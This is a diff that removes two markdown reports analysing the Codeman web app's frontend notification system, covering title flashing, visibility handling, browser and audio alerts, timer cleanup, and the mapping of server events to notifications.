||||
|
||||
@keyframes pulse {
|
||||
0%, 100% { opacity: 1; }
|
||||
50% { opacity: 0.4; }
|
||||
}
|
||||
```
|
||||
|
||||
The green status dot pulses when a session is busy/working. Pure CSS.
|
||||
|
||||
### 3.5 Connection Status Animations (styles.css lines 405-413)
|
||||
|
||||
```css
|
||||
.connection-dot.warning {
|
||||
animation: connection-pulse 1.5s ease-in-out infinite;
|
||||
}
|
||||
.connection-dot.error {
|
||||
animation: connection-pulse 0.8s ease-in-out infinite;
|
||||
}
|
||||
```
|
||||
|
||||
Connection indicator pulses differently for warning vs error states.
|
||||
|
||||
### 3.6 Other CSS Animations
|
||||
|
||||
| Animation | Location | Purpose |
|
||||
|-----------|----------|---------|
|
||||
| `respawn-blocked-pulse` | styles.css:798 | Respawn blocked indicator |
|
||||
| `pulse-hook` | styles.css:899 | Hook event indicator |
|
||||
| `ralph-pulse` | styles.css:1013 | Ralph tracker active state |
|
||||
| `circuit-breaker-pulse` | styles.css:1057 | Circuit breaker warning |
|
||||
| `wizard-pulse` | styles.css:5541 | Ralph wizard active indicator |
|
||||
| `plan-subagent-pulse` | styles.css:5558 | Plan subagent active |
|
||||
| `notif-slide-in` | styles.css:4088 | Notification drawer slide |
|
||||
|
||||
### 3.7 Mobile-Specific Animations (mobile.css)
|
||||
|
||||
Mobile CSS is minimal for animations:
|
||||
- `slideUp` (line 1091) - Mobile toolbar slide animation
|
||||
- `caseModalSlideUp` (line 1204) - Case modal bottom-sheet animation
|
||||
|
||||
No mobile-specific blinking or notification animations exist.
|
||||
|
||||
---
|
||||
|
||||
## 4. Tab Visibility API
|
||||
|
||||
### Implementation (app.js lines 881-893)
|
||||
|
||||
The `NotificationManager` constructor sets up two visibility listeners:
|
||||
|
||||
```js
|
||||
// Standard visibility change
|
||||
document.addEventListener('visibilitychange', () => {
|
||||
this.isTabVisible = !document.hidden;
|
||||
if (this.isTabVisible) {
|
||||
this.onTabVisible();
|
||||
}
|
||||
});
|
||||
|
||||
// iOS Safari: pageshow fires on back-forward cache restore (bfcache)
|
||||
window.addEventListener('pageshow', (e) => {
|
||||
if (e.persisted) {
|
||||
this.isTabVisible = true;
|
||||
this.onTabVisible();
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### Behavior When Tab Hidden
|
||||
- `isTabVisible` set to `false`
|
||||
- New notifications trigger `updateTabTitle()` which starts the title blink interval
|
||||
- Browser notifications are sent (subject to per-event preferences)
|
||||
|
||||
### Behavior When Tab Becomes Visible (`onTabVisible()` - line 1241)
|
||||
```js
|
||||
onTabVisible() {
|
||||
this.stopTitleFlash(); // Stop title blinking
|
||||
if (this.isDrawerOpen) {
|
||||
this.markAllRead(); // Mark all read if drawer is open
|
||||
}
|
||||
// Re-fit terminal dimensions
|
||||
if (this.app?.fitAddon && this.app?.activeSessionId) {
|
||||
this.app.fitAddon.fit();
|
||||
this.app.sendResize(this.app.activeSessionId);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Key detail: Title flash always stops when tab becomes visible, but **unread count is NOT reset** unless the notification drawer is open. This means the badge count persists until the user interacts with it.
|
||||
|
||||
---
|
||||
|
||||
## 5. Focus/Blur Handling
|
||||
|
||||
### No window focus/blur listeners
|
||||
Codeman does **not** use `window.addEventListener('focus')` or `window.addEventListener('blur')`. It relies solely on the Page Visibility API (`visibilitychange` + `pageshow`).
|
||||
|
||||
This is the correct modern approach. The `focus`/`blur` events are unreliable (fire for devtools, iframe changes, etc.) while `visibilitychange` accurately reflects whether the user can see the tab.
|
||||
|
||||
### Other focus-related listeners
|
||||
- `document.addEventListener('focusin')` (line 238) - Mobile keyboard handler for scrolling inputs into view
|
||||
- Various `element.focus()` calls for modal focus trapping (`FocusTrap` class, line 742)
|
||||
- `window.focus()` in browser notification click handler (line 1135) to bring window to front
|
||||
|
||||
None of these are related to notification/blinking behavior.
|
||||
|
||||
---
|
||||
|
||||
## 6. Multiple Notification Stacking
|
||||
|
||||
### Can intervals stack? NO
|
||||
|
||||
The `updateTabTitle()` method has a guard (line 1084):
|
||||
|
||||
```js
|
||||
if (!this.titleFlashInterval) {
|
||||
this.titleFlashInterval = setInterval(() => { ... }, TITLE_FLASH_INTERVAL_MS);
|
||||
}
|
||||
```
|
||||
|
||||
Only one interval is ever created. Subsequent notifications while the tab is hidden simply update `this.unreadCount` which is read by the existing interval callback. The displayed count stays current without creating new intervals.
|
||||
|
||||
### Notification Grouping
|
||||
|
||||
Notifications within the same category + session within 5 seconds are **grouped** instead of creating new entries (lines 986-997):
|
||||
|
||||
```js
|
||||
const groupKey = `${category}:${sessionId || 'global'}`;
|
||||
const existing = this.groupingMap.get(groupKey);
|
||||
if (existing) {
|
||||
existing.notification.count = (existing.notification.count || 1) + 1;
|
||||
existing.notification.message = message;
|
||||
existing.notification.timestamp = Date.now();
|
||||
clearTimeout(existing.timeout);
|
||||
existing.timeout = setTimeout(() => this.groupingMap.delete(groupKey), GROUPING_TIMEOUT_MS);
|
||||
this.scheduleRender();
|
||||
return; // <-- Early return prevents duplicate badge/title/browser/audio triggers
|
||||
}
|
||||
```
|
||||
|
||||
The grouping early return prevents:
|
||||
- Duplicate badge increments
|
||||
- Duplicate title updates
|
||||
- Duplicate browser notifications
|
||||
- Duplicate audio alerts
|
||||
|
||||
### Browser Notification Rate Limiting
|
||||
|
||||
Even without grouping, browser notifications are rate-limited to 1 per 3 seconds (lines 1122-1125):
|
||||
|
||||
```js
|
||||
const now = Date.now();
|
||||
if (now - this.lastBrowserNotifTime < 3000) return;
|
||||
this.lastBrowserNotifTime = now;
|
||||
```
|
||||
|
||||
### Notification List Cap
|
||||
|
||||
The notification list is capped at 100 entries (line 1014):
|
||||
```js
|
||||
if (this.notifications.length > 100) this.notifications.pop();
|
||||
```
|
||||
|
||||
### Grouping Timeout Cleanup
|
||||
|
||||
Grouping map entries self-clean after 5 seconds via `setTimeout`. These timeouts are also explicitly cleaned up in `handleInit()` (lines 3299-3304):
|
||||
|
||||
```js
|
||||
if (this.notificationManager?.groupingMap) {
|
||||
for (const { timeout } of this.notificationManager.groupingMap.values()) {
|
||||
clearTimeout(timeout);
|
||||
}
|
||||
this.notificationManager.groupingMap.clear();
|
||||
}
|
||||
```
|
||||
|
||||
### Rapid Event Scenario
|
||||
|
||||
If 50 events fire while the tab is hidden:
|
||||
1. First event: creates notification, starts title flash, sends browser notif
|
||||
2. Events 2-N within 5s of same category+session: grouped (count increments, no new intervals)
|
||||
3. Events of different categories: new notifications, but title flash interval is singular
|
||||
4. Browser notifications: only 1 per 3s gets through
|
||||
|
||||
**Verdict**: Well-protected against stacking/compounding.
|
||||
|
||||
---
|
||||
|
||||
## 7. Team Agent Blinking
|
||||
|
||||
### Current State: NO team-specific blinking
|
||||
|
||||
Searching for `team:` SSE event listeners finds **none**. There are no `addListener('team:...')` handlers in app.js.
|
||||
|
||||
Team agent data (teammates, tasks, colors) is tracked via:
|
||||
- `this.teammateMap` (Map of agent info)
|
||||
- `this.teammatePanesByName` (Map of pane targets)
|
||||
- `this.teammateTerminals` (Map of terminal instances)
|
||||
|
||||
But these are populated from **subagent data**, not dedicated team events. Teammates appear as standard subagents and are detected by `subagent-watcher.ts` (as noted in MEMORY.md: "Teammates appear as standard subagents").
|
||||
|
||||
### What team events could trigger blinking?
|
||||
|
||||
Currently, subagent events have their own notification category:
|
||||
```js
|
||||
// Default event type preferences (line 906-907)
|
||||
subagent_spawn: { enabled: false, browser: false, audio: false },
|
||||
subagent_complete: { enabled: false, browser: false, audio: false },
|
||||
```
|
||||
|
||||
Both are **disabled by default**. Even if enabled, they go through the standard `notify()` path which would trigger title blinking only when the tab is hidden.
|
||||
|
||||
### Should team events trigger blinking?
|
||||
|
||||
The MEMORY.md implementation priority notes:
|
||||
> 1. Team-aware idle detection (prevent premature respawn)
|
||||
|
||||
There is no `TeammateIdle` or `TaskCompleted` hook handler in the frontend. The hooks are mentioned in MEMORY.md as valid settings schema keys but have no frontend implementation yet.
|
||||
|
||||
If/when team hooks are implemented, they should:
|
||||
- Potentially trigger tab-alert-action (red blink) for teammate stuck/blocked states
|
||||
- Use the notification system for teammate task completions
|
||||
- Consider a new notification category (e.g., `teammate_idle`, `team_task_complete`) with configurable per-event preferences
|
||||
|
||||
---
|
||||
|
||||
## 8. Cleanup Analysis
|
||||
|
||||
### All Interval/Timeout Cleanup Points
|
||||
|
||||
| Timer | Created | Cleared | Risk |
|
||||
|-------|---------|---------|------|
|
||||
| `titleFlashInterval` | `updateTabTitle()` L1085 | `stopTitleFlash()` L1099, `onTabVisible()` L1242, `handleInit()` L3296 | LOW - guarded + multi-path cleanup |
|
||||
| Grouping timeouts | `notify()` L994/L1017 | Self-expire 5s, `handleInit()` L3301 | LOW - TTL + explicit cleanup |
|
||||
| Browser notif auto-close | `sendBrowserNotif()` L1143 | Self-expire 8s (via `setTimeout`) | NONE - fires once |
|
||||
| Audio oscillator | `playAudioAlert()` L1178 | Self-stops 0.15s | NONE - Web Audio manages it |
|
||||
| Idle timer per session | `session:idle` handler L2384 | `session:working` L2415, `handleInit()` L3269, `removeSession()` L4138 | LOW - cleaned in all paths |
|
||||
|
||||
### handleInit Cleanup (SSE Reconnect)
|
||||
|
||||
The `handleInit()` method (called on every SSE reconnect) performs comprehensive cleanup (lines 3260-3321):
|
||||
|
||||
1. Clears all Maps (sessions, ralphStates, terminalBuffers, etc.)
|
||||
2. Clears all idle timers
|
||||
3. Clears flicker filter state
|
||||
4. Clears pending terminal writes
|
||||
5. Clears pending hooks and tab alerts
|
||||
6. **Clears notification title flash interval** (L3295-3298)
|
||||
7. **Clears notification grouping timeouts** (L3300-3304)
|
||||
8. Disconnects terminal resize observer
|
||||
9. Clears plan loading timers
|
||||
10. Clears countdown intervals
|
||||
11. Clears run summary auto-refresh timer
|
||||
|
||||
### removeSession Cleanup (line 4120-4139)
|
||||
|
||||
When a session is removed:
|
||||
- `pendingHooks.delete(sessionId)` (L4128)
|
||||
- `tabAlerts.delete(sessionId)` (L4129)
|
||||
- Idle timer cleared (L4136-4139)
|
||||
- All floating windows closed
|
||||
|
||||
### Browser Notification Auto-Close
|
||||
|
||||
The `setTimeout(() => notif.close(), 8000)` at line 1143 creates an anonymous closure over the `notif` variable. This is safe because:
|
||||
1. The timeout fires once and is garbage collected
|
||||
2. `notif.close()` is idempotent
|
||||
3. 8 seconds is short enough to not accumulate
|
||||
|
||||
### Edge Case: AudioContext
|
||||
|
||||
The `AudioContext` (line 1167) is created once and reused:
|
||||
```js
|
||||
if (!this.audioCtx) {
|
||||
this.audioCtx = new (window.AudioContext || window.webkitAudioContext)();
|
||||
}
|
||||
```
|
||||
|
||||
This is never explicitly closed, but `AudioContext` is lightweight when idle and the singleton pattern prevents accumulation. Not a practical concern.
|
||||
|
||||
---
|
||||
|
||||
## Architecture Diagram
|
||||
|
||||
```
|
||||
notify() called
|
||||
|
|
||||
+-----------+-----------+
|
||||
| |
|
||||
enabled check preferences check
|
||||
| |
|
||||
[Layer 1: Drawer] [Layer 2: Title Flash]
|
||||
- Add to notifications[] - Only if tab hidden
|
||||
- Cap at 100 - Single interval guard
|
||||
- Update badge count - Toggles every 1500ms
|
||||
- requestAnimationFrame
|
||||
| |
|
||||
[Layer 3: Browser Notif] [Layer 4: Audio]
|
||||
- Per-event prefs - Per-event prefs
|
||||
- Rate limit 3s - Web Audio API
|
||||
- Auto-close 8s - 0.15s beep
|
||||
- Permission check - Singleton AudioContext
|
||||
|
||||
INDEPENDENT:
|
||||
[Tab CSS Alerts]
|
||||
- Driven by pendingHooks state machine
|
||||
- tab-alert-action (red, 2.5s cycle)
|
||||
- tab-alert-idle (yellow, 3.5s cycle)
|
||||
- Pure CSS animation, no JS timers
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Summary of Findings
|
||||
|
||||
| Aspect | Status | Notes |
|
||||
|--------|--------|-------|
|
||||
| Title blink interval safety | SAFE | Guard prevents stacking; 3-path cleanup |
|
||||
| Favicon changes | NOT IMPLEMENTED | Static inline SVG; no dynamic swapping |
|
||||
| CSS tab animations | SAFE | Pure CSS infinite animations; no JS timer cost |
|
||||
| Visibility API usage | CORRECT | `visibilitychange` + `pageshow` (bfcache) |
|
||||
| Focus/blur handling | NOT USED (correct) | Relies on Visibility API instead |
|
||||
| Notification stacking | WELL PROTECTED | Grouping, rate limiting, single interval |
|
||||
| Team agent blinking | NOT IMPLEMENTED | No `team:` SSE handlers; teammates use subagent path |
|
||||
| Interval cleanup | COMPREHENSIVE | `handleInit`, `onTabVisible`, `removeSession`, `markAllRead`, `clearAll` |
|
||||
| Memory leak risk | LOW | All timers have explicit cleanup paths |
|
||||
|
||||
### Potential Improvements
|
||||
|
||||
1. **Dynamic favicon**: Could swap favicon to a red/orange variant when there are unread critical notifications (common pattern in web apps).
|
||||
|
||||
2. **Team agent notifications**: When `TeammateIdle` and `TaskCompleted` hooks are implemented, add dedicated notification categories with configurable preferences in the per-event settings grid.
|
||||
|
||||
3. **Unread count on tab return**: Currently, returning to the tab stops the title flash but does NOT reset the unread count. The user must open the drawer or click individual notifications. Consider auto-marking as read after a brief delay when the tab becomes visible.
|
||||
|
||||
4. **Notification sound variety**: Currently all audio alerts use the same 660Hz sine wave. Different categories could use different tones (e.g., lower pitch for info, higher for critical).
|
||||
@@ -1,749 +0,0 @@
|
||||
# Codeman Frontend Notification System -- Detailed Report
|
||||
|
||||
> Generated: 2026-02-17
|
||||
> Source files analyzed:
|
||||
> - `/home/arkon/default/codeman/src/web/public/app.js` (main frontend, ~15k lines)
|
||||
> - `/home/arkon/default/codeman/src/web/public/index.html`
|
||||
> - `/home/arkon/default/codeman/src/web/public/styles.css`
|
||||
> - `/home/arkon/default/codeman/src/web/public/mobile.css`
|
||||
|
||||
---
|
||||
|
||||
## 1. Architecture Overview
|
||||
|
||||
The notification system is a **4-layer** design, all implemented in the `NotificationManager` class (lines 860-1268 of `app.js`). The layers are:
|
||||
|
||||
| Layer | Mechanism | When Active |
|
||||
|-------|-----------|-------------|
|
||||
| 1 | In-app notification drawer | Always (when enabled) |
|
||||
| 2 | Tab title flashing | When tab is hidden (background) |
|
||||
| 3 | Browser Notification API (OS-level) | When enabled + permission granted |
|
||||
| 4 | Audio alert (Web Audio API) | When enabled for specific events |
|
||||
|
||||
The `NotificationManager` is instantiated once at line 1404:
|
||||
```js
|
||||
this.notificationManager = new NotificationManager(this);
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. NotificationManager Class (lines 860-1268)
|
||||
|
||||
### 2.1 Constructor (lines 861-893)
|
||||
|
||||
State initialized:
|
||||
- `this.notifications = []` -- in-memory log (max 100 items)
|
||||
- `this.unreadCount = 0` -- badge counter
|
||||
- `this.isTabVisible = !document.hidden` -- visibility tracking
|
||||
- `this.isDrawerOpen = false`
|
||||
- `this.originalTitle = document.title` -- saved for flash restore
|
||||
- `this.titleFlashInterval = null` -- interval ID for title flashing
|
||||
- `this.titleFlashState = false` -- toggle state for flash
|
||||
- `this.lastBrowserNotifTime = 0` -- rate-limit timestamp
|
||||
- `this.audioCtx = null` -- lazily created Web Audio context
|
||||
- `this.groupingMap = new Map()` -- debounce grouping (5s window)
|
||||
|
||||
Visibility listeners:
|
||||
- `document.visibilitychange` -- updates `isTabVisible`, calls `onTabVisible()` when tab becomes visible
|
||||
- `window.pageshow` (with `e.persisted` check) -- handles iOS Safari back-forward cache (bfcache) restore
|
||||
|
||||
### 2.2 Preferences System (lines 896-960)
|
||||
|
||||
#### Default Event-Type Preferences (lines 897-908)
|
||||
|
||||
```js
|
||||
const defaultEventTypes = {
|
||||
permission_prompt: { enabled: true, browser: true, audio: true },
|
||||
elicitation_dialog: { enabled: true, browser: true, audio: true },
|
||||
idle_prompt: { enabled: true, browser: true, audio: false },
|
||||
stop: { enabled: true, browser: false, audio: false },
|
||||
session_error: { enabled: true, browser: true, audio: false },
|
||||
respawn_cycle: { enabled: true, browser: false, audio: false },
|
||||
token_milestone: { enabled: true, browser: false, audio: false },
|
||||
ralph_complete: { enabled: true, browser: true, audio: true },
|
||||
subagent_spawn: { enabled: false, browser: false, audio: false },
|
||||
subagent_complete: { enabled: false, browser: false, audio: false },
|
||||
};
|
||||
```
|
||||
|
||||
#### Device-Specific Defaults (lines 910-923)
|
||||
|
||||
Mobile devices (`MobileDetection.getDeviceType() === 'mobile'`) get notifications **disabled by default**:
|
||||
```js
|
||||
const isMobile = MobileDetection.getDeviceType() === 'mobile';
|
||||
const defaults = {
|
||||
enabled: !isMobile, // OFF on mobile
|
||||
browserNotifications: !isMobile, // OFF on mobile
|
||||
audioAlerts: false, // OFF everywhere
|
||||
stuckThresholdMs: 600000, // 10 minutes
|
||||
muteCritical: false, // Legacy urgency muting
|
||||
muteWarning: false,
|
||||
muteInfo: false,
|
||||
eventTypes: defaultEventTypes,
|
||||
_version: 3,
|
||||
};
|
||||
```
|
||||
|
||||
#### Storage Keys (lines 952-956)
|
||||
|
||||
Device-specific localStorage keys prevent mobile settings from overriding desktop settings:
|
||||
- Desktop: `codeman-notification-prefs`
|
||||
- Mobile: `codeman-notification-prefs-mobile`
|
||||
|
||||
#### Version Migrations (lines 928-940)
|
||||
|
||||
- v1 -> v2: `browserNotifications` default changed from `false` to `true`
|
||||
- v2 -> v3: Added `eventTypes` object with per-event-type preferences
|
||||
|
||||
#### Server Sync (lines 9470-9475, 9787-9828)
|
||||
|
||||
Notification preferences are saved to the server alongside app settings via `PUT /api/settings`:
|
||||
```js
|
||||
body: JSON.stringify({ ...settings, notificationPreferences: notifPrefsToSave })
|
||||
```
|
||||
|
||||
On load, server prefs are applied **only if localStorage has none** (line 9815-9818):
|
||||
```js
|
||||
if (notificationPreferences && this.notificationManager) {
|
||||
const localNotifPrefs = localStorage.getItem(this.notificationManager.getStorageKey());
|
||||
if (!localNotifPrefs) {
|
||||
this.notificationManager.preferences = notificationPreferences;
|
||||
this.notificationManager.savePreferences();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
This means localStorage always takes precedence over server-stored prefs.
|
||||
|
||||
---
|
||||
|
||||
## 3. The `notify()` Flow (lines 962-1038)
|
||||
|
||||
```
|
||||
notify() called
|
||||
|
|
||||
+-- preferences.enabled === false? --> RETURN (no-op)
|
||||
|
|
||||
+-- Check per-event-type preferences (eventTypes[category])
|
||||
| |
|
||||
| +-- Found: eventPref.enabled === false? --> RETURN
|
||||
| | shouldBrowserNotify = eventPref.browser && prefs.browserNotifications
|
||||
| | shouldAudioAlert = eventPref.audio && prefs.audioAlerts
|
||||
| |
|
||||
| +-- Not found: fall back to legacy urgency-based muting
|
||||
| if muteCritical/muteWarning/muteInfo matches --> RETURN
|
||||
| shouldBrowserNotify = prefs.browserNotifications && (critical/warning/!tabVisible)
|
||||
| shouldAudioAlert = critical && prefs.audioAlerts
|
||||
|
|
||||
+-- Grouping: same category+session within 5s? --> increment count, update message, RETURN
|
||||
|
|
||||
+-- Create notification object { id, urgency, category, sessionId, sessionName, title, message, timestamp, read, count }
|
||||
|
|
||||
+-- Add to this.notifications[] (max 100, FIFO eviction)
|
||||
|
|
||||
+-- Track in groupingMap (5s TTL)
|
||||
|
|
||||
+-- unreadCount++; updateBadge(); scheduleRender()
|
||||
|
|
||||
+-- Layer 2: if tab NOT visible --> updateTabTitle() (start title flashing)
|
||||
|
|
||||
+-- Layer 3: if shouldBrowserNotify --> sendBrowserNotif()
|
||||
|
|
||||
+-- Layer 4: if shouldAudioAlert --> playAudioAlert()
|
||||
```
|
||||
|
||||
### 3.1 Notification Grouping (lines 986-997)
|
||||
|
||||
Within a 5-second window, notifications with the same `category:sessionId` key are grouped:
|
||||
- Count is incremented on existing notification
|
||||
- Message is updated to latest
|
||||
- Timestamp refreshed
|
||||
- No new notification entry is created
|
||||
- The grouping timeout is reset (sliding window)
|
||||
|
||||
This prevents notification spam for rapid-fire events.
|
||||
|
||||
---
|
||||
|
||||
## 4. Layer 1: In-App Notification Drawer
|
||||
|
||||
### 4.1 HTML Structure (index.html lines 1394-1406)
|
||||
|
||||
```html
|
||||
<div class="notification-drawer" id="notifDrawer">
|
||||
<div class="notif-drawer-header">
|
||||
<span class="notif-drawer-title">Notifications</span>
|
||||
<div class="notif-drawer-actions">
|
||||
<button onclick="markAllRead()">checkmark</button>
|
||||
<button onclick="clearAll()">trash</button>
|
||||
<button onclick="toggleNotifications()">X</button>
|
||||
</div>
|
||||
</div>
|
||||
<div class="notif-drawer-list" id="notifList"></div>
|
||||
<div class="notif-drawer-empty" id="notifEmpty">No notifications</div>
|
||||
</div>
|
||||
```
|
||||
|
||||
### 4.2 Bell Button (index.html lines 63-66)
|
||||
|
||||
```html
|
||||
<button class="btn-icon-header btn-notifications" onclick="app.toggleNotifications()">
|
||||
<svg><!-- bell icon --></svg>
|
||||
<span class="notification-badge" id="notifBadge" style="display:none;">0</span>
|
||||
</button>
|
||||
```
|
||||
|
||||
The bell button visibility is controlled by the `enabled` preference (line 9647-9652):
|
||||
```js
|
||||
const notifEnabled = this.notificationManager?.preferences?.enabled ?? true;
|
||||
const notifBtn = document.querySelector('.btn-notifications');
|
||||
if (notifBtn) {
|
||||
notifBtn.style.display = notifEnabled ? '' : 'none';
|
||||
}
|
||||
```
|
||||
|
||||
### 4.3 Badge (lines 1230-1238)
|
||||
|
||||
The red badge on the bell shows unread count. It pulses via CSS animation:
|
||||
```css
|
||||
.notification-badge {
|
||||
position: absolute; top: 2px; right: 2px;
|
||||
background: var(--red); color: #fff;
|
||||
animation: notif-badge-pulse 2s ease-in-out infinite;
|
||||
}
|
||||
@keyframes notif-badge-pulse {
|
||||
0%, 100% { transform: scale(1); }
|
||||
50% { transform: scale(1.15); }
|
||||
}
|
||||
```
|
||||
|
||||
Display logic: `badge.style.display = unreadCount > 0 ? 'flex' : 'none'`.
|
||||
Shows `99+` if count exceeds 99.
|
||||
|
||||
### 4.4 Drawer Rendering (lines 1041-1079)
|
||||
|
||||
Uses `requestAnimationFrame` for debounced rendering. Each notification item shows:
|
||||
- Urgency color (left border: red/yellow/blue)
|
||||
- Title with count multiplier (e.g., "Permission Required x3")
|
||||
- Relative timestamp ("now", "5m ago", "2h ago")
|
||||
- Message (truncated with ellipsis)
|
||||
- Session chip (session name)
|
||||
- Unread highlight (subtle blue background)
|
||||
- Slide-in animation (`notif-slide-in`)
|
||||
|
||||
Clicking a notification: marks as read, decrements unread count, switches to the notification's session.
|
||||
|
||||
### 4.5 Drawer Toggle (lines 1183-1192)
|
||||
|
||||
`toggleDrawer()` adds/removes the `open` class. The drawer slides in from the right via CSS transform:
|
||||
```css
|
||||
.notification-drawer {
|
||||
transform: translateX(100%);
|
||||
transition: transform 0.2s ease;
|
||||
}
|
||||
.notification-drawer.open {
|
||||
transform: translateX(0);
|
||||
}
|
||||
```
|
||||
|
||||
### 4.6 CSS Styling (styles.css lines 3965-4151)
|
||||
|
||||
Drawer is 340px wide, fixed position, full height below header, z-index 10001.
|
||||
Items have color-coded left borders: red (critical), yellow (warning), blue (info).
|
||||
Mobile override: full-width with safe area padding (mobile.css lines 1049-1058).
|
||||
|
||||
---
|
||||
|
||||
## 5. Layer 2: Tab Title Flashing (lines 1082-1103)
|
||||
|
||||
### Behavior
|
||||
|
||||
When the tab is not visible and there are unread notifications:
|
||||
1. `setInterval` at 1500ms toggles between:
|
||||
- Warning emoji + unread count: `"(3) Codeman"`
|
||||
- Original title: `"Codeman"`
|
||||
2. Set immediately on first notification (no wait for first interval tick)
|
||||
|
||||
### Stopping
|
||||
|
||||
`onTabVisible()` (line 1241) calls `stopTitleFlash()`, which:
|
||||
1. Clears the interval
|
||||
2. Resets `titleFlashState = false`
|
||||
3. Restores `document.title = this.originalTitle`
|
||||
|
||||
If the drawer is open when tab becomes visible, all notifications are marked as read.
|
||||
|
||||
### Memory Leak Prevention (lines 3294-3304)
|
||||
|
||||
On SSE reconnect (`handleInit()`), the title flash interval is explicitly cleared:
|
||||
```js
|
||||
if (this.notificationManager?.titleFlashInterval) {
|
||||
clearInterval(this.notificationManager.titleFlashInterval);
|
||||
this.notificationManager.titleFlashInterval = null;
|
||||
}
|
||||
```
|
||||
Grouping timeouts are also cleared to prevent orphaned timers.
|
||||
|
||||
### Potential Issue
|
||||
|
||||
The title flash uses a Unicode warning emoji (`\u26A0\uFE0F`). This displays correctly on all modern browsers but may not render on very old terminals/browsers.
|
||||
|
||||
---
|
||||
|
||||
## 6. Layer 3: Browser Notification API (lines 1106-1161)
|
||||
|
||||
### Permission Flow (lines 1107-1120)
|
||||
|
||||
```
|
||||
sendBrowserNotif() called
|
||||
|
|
||||
+-- prefs.browserNotifications === false? --> RETURN
|
||||
+-- Notification API undefined? --> RETURN
|
||||
+-- Notification.permission === 'default'?
|
||||
| --> Auto-request permission
|
||||
| --> If granted, re-call sendBrowserNotif() recursively
|
||||
| --> RETURN (wait for permission dialog)
|
||||
+-- Notification.permission !== 'granted'? --> RETURN
|
||||
+-- Rate limit: < 3s since last? --> RETURN
|
||||
+-- Create Notification
|
||||
```
|
||||
|
||||
### Notification Object (lines 1127-1143)
|
||||
|
||||
```js
|
||||
new Notification(`Codeman: ${title}`, {
|
||||
body,
|
||||
tag, // Groups same-tag notifications (replaces previous with same tag)
|
||||
icon: '/favicon.ico',
|
||||
silent: true, // We handle audio ourselves
|
||||
});
|
||||
```
|
||||
|
||||
- **onclick**: focuses window, switches to session, closes notification
|
||||
- **Auto-close**: 8 seconds via `setTimeout(() => notif.close(), 8000)`
|
||||
- **Rate limit**: Max 1 browser notification per 3 seconds (`BROWSER_NOTIF_RATE_LIMIT_MS`)
|
||||
|
||||
### Manual Permission Request (lines 1146-1161)
|
||||
|
||||
The settings UI has an "Ask" button that calls `requestPermission()`:
|
||||
- Shows toast on success/failure
|
||||
- Updates permission status display (checkmark/X/?)
|
||||
- Auto-enables `browserNotifications` preference on grant
|
||||
|
||||
### Permission Status Display
|
||||
|
||||
In settings (index.html line 993), a `<span class="settings-status" id="notifPermissionStatus">?</span>` shows:
|
||||
- `granted` -> checkmark with green background
|
||||
- `denied` -> X with red background
|
||||
- `default` -> `?`
|
||||
|
||||
### HTTPS Requirement
|
||||
|
||||
The settings UI shows a hint (index.html line 996):
|
||||
```
|
||||
For remote access, HTTPS is required. Start with: codeman web --https
|
||||
```
|
||||
|
||||
Browser Notification API requires a secure context (HTTPS or localhost). This hint warns users who access Codeman remotely over HTTP.
|
||||
|
||||
---
|
||||
|
||||
## 7. Layer 4: Audio Alerts (lines 1163-1181)
|
||||
|
||||
### Implementation
|
||||
|
||||
Uses Web Audio API to generate a short sine wave beep:
|
||||
```js
|
||||
playAudioAlert() {
|
||||
const ctx = new AudioContext();
|
||||
const oscillator = ctx.createOscillator();
|
||||
const gain = ctx.createGain();
|
||||
oscillator.type = 'sine';
|
||||
oscillator.frequency.setValueAtTime(660, ctx.currentTime); // 660 Hz (high E)
|
||||
gain.gain.setValueAtTime(0.15, ctx.currentTime); // Low volume
|
||||
gain.gain.exponentialRampToValueAtTime(0.01, ctx.currentTime + 0.15); // 150ms fade
|
||||
oscillator.start(ctx.currentTime);
|
||||
oscillator.stop(ctx.currentTime + 0.15); // 150ms duration
|
||||
}
|
||||
```
|
||||
|
||||
The `AudioContext` is lazily created and reused across alerts. Errors are silently caught.
|
||||
|
||||
### Potential Issues
|
||||
|
||||
1. **Autoplay policy**: Modern browsers block `AudioContext` creation until user interaction. The first `playAudioAlert()` call may silently fail if the user hasn't clicked anything yet. The code handles this gracefully via try/catch, but the user gets no feedback that audio failed.
|
||||
|
||||
2. **Mobile iOS restrictions**: iOS Safari requires `AudioContext.resume()` after user gesture. The current code does not call `resume()`, so audio alerts may never work on iOS unless the user has already interacted with an `AudioContext` (e.g., by clicking something that triggers audio).
|
||||
|
||||
3. **No audio indicator**: There is no visual feedback that an audio alert played (or failed to play).
|
||||
|
||||
---
|
||||
|
||||
## 8. SSE Event -> Notification Mapping
|
||||
|
||||
The following table maps every SSE event that triggers a notification, with exact line numbers:
|
||||
|
||||
| SSE Event | Category | Urgency | Line | Condition |
|
||||
|-----------|----------|---------|------|-----------|
|
||||
| `session:error` | `session-error` | critical | 2341 | Always |
|
||||
| `session:exit` | `session-crash` | critical | 2360 | Non-zero exit code only |
|
||||
| `session:idle` | `session-stuck` | warning | 2386 | After stuck threshold timeout (default 10min), only if respawn not enabled |
|
||||
| `respawn:blocked` | `respawn-blocked` | critical | 2488 | Always (circuit breaker, exit signal, or status blocked) |
|
||||
| `respawn:autoAcceptSent` | `auto-accept` | info | 2513 | Always |
|
||||
| `session:autoClear` | `auto-clear` | info | 2623 | Always |
|
||||
| `session:ralphCompletionDetected` | `ralph-complete` | warning | 2746 | Deduped by completion key (30s cooldown) |
|
||||
| `session:circuitBreakerUpdate` | `circuit-breaker` | critical | 2772 | Only when state === 'OPEN' |
|
||||
| `session:exitGateMet` | `exit-gate` | warning | 2787 | Always |
|
||||
| `hook:idle_prompt` | `hook-idle` | warning | 2823 | Always |
|
||||
| `hook:permission_prompt` | `hook-permission` | critical | 2841 | Always |
|
||||
| `hook:elicitation_dialog` | `hook-elicitation` | critical | 2858 | Always |
|
||||
| `hook:stop` | `hook-stop` | info | 2875 | Always |
|
||||
| Circuit breaker reset | `circuit-breaker` | info | 10634 | On successful reset |
|
||||
| Fix plan error | `fix-plan` | error | 10657 | On API error |
|
||||
| Fix plan copied | `fix-plan` | info | 10719 | On clipboard copy |
|
||||
| Fix plan written | `fix-plan` | info | 10738 | On successful write |
|
||||
| Fix plan write error | `fix-plan` | error | 10746 | On write failure |
|
||||
| Fix plan imported | `fix-plan` | info | 10768 | On successful import |
|
||||
| Fix plan not found | `fix-plan` | warning | 10777 | When file not found |
|
||||
|
||||
